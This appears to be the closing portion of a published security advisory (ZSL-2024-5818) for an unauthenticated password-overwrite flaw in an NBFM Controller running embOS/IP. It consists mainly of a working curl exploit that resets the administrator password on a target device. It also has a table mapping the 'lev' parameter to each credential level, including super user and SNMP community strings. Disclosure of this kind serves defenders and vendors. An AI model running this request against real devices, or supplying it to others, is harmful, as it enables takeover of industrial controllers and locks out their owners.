Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5818
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php


18.08.2023

--


# Overwrite the administrator (level 2) password without authenticating.
# Quote the URL: an unquoted & makes the shell background curl and treat pass=... as an assignment.
$ curl -s 'http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234'

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
</code></pre>